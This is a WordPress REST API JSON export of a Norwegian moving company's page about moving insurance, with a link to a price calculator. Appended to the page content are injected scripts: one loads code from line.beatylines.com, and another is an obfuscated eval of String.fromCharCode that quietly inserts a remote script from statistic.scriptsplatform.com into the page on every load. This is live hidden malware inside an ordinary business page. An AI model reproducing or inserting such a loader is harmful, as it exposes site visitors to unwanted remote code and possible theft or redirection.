{"id":5179,"date":"2021-02-28T22:26:39","date_gmt":"2021-02-28T21:26:39","guid":{"rendered":"http:\/\/ms24.no\/?page_id=5179"},"modified":"2021-04-13T18:28:04","modified_gmt":"2021-04-13T16:28:04","slug":"flytteforsikring","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=5179","title":{"rendered":"Flytteforsikring"},"content":{"rendered":"<h2>Flytteforsikring<\/h2>\n<p>Med flytteforsikring er du sikret om noe skulle skje med flyttelasset p\u00e5 veien mellom det gamle og det nye hjemmet.<\/p>\n<p>Dersom det ikke tegnes flytteforsikring, vil godset kun v\u00e6re dekket av ordin\u00e6r transportforsikring som er begrenset av lover og avtaler, og ikke er tilstrekkelig for \u00e5 sikre godset fullt ut.<br \/>\n!<br \/>\nVi b\u00e5de tilbyr og anbefaler flytteforsikring gjennom v\u00e5r avtale med Gjensidig Forsikring. Det er viktig at gjenstandene dine er sikret hele veien!<br \/>\nMen sjekk om du allerede har forsikringer som allerede gir deg den dekningen du trenger ved flytting.<\/p>\n<h2><a href=\"http:\/\/ms24.no\/booking\/index_one_step.php\"><br \/>\nPr\u00f8v v\u00e5r priskalkulator som umiddelbart gir deg&gt;&gt;&gt;<\/p>\n<p>svar p\u00e5 hva v\u00e5re tjenester vil koste for din bedrift!<br \/>\n<\/a><\/h2>\n<p><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Flytteforsikring Med flytteforsikring er du sikret om noe skulle skje med flyttelasset p\u00e5 veien mellom det gamle og det nye hjemmet. Dersom det ikke tegnes flytteforsikring, vil godset kun v\u00e6re dekket av ordin\u00e6r transportforsikring som er begrenset av lover og avtaler, og ikke er tilstrekkelig for \u00e5 sikre godset fullt ut. ! Vi b\u00e5de tilbyr [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-5179","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5179","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5179"}],"version-history":[{"count":20,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5179\/revisions"}],"predecessor-version":[{"id":5756,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5179\/revisions\/5756"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5179"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}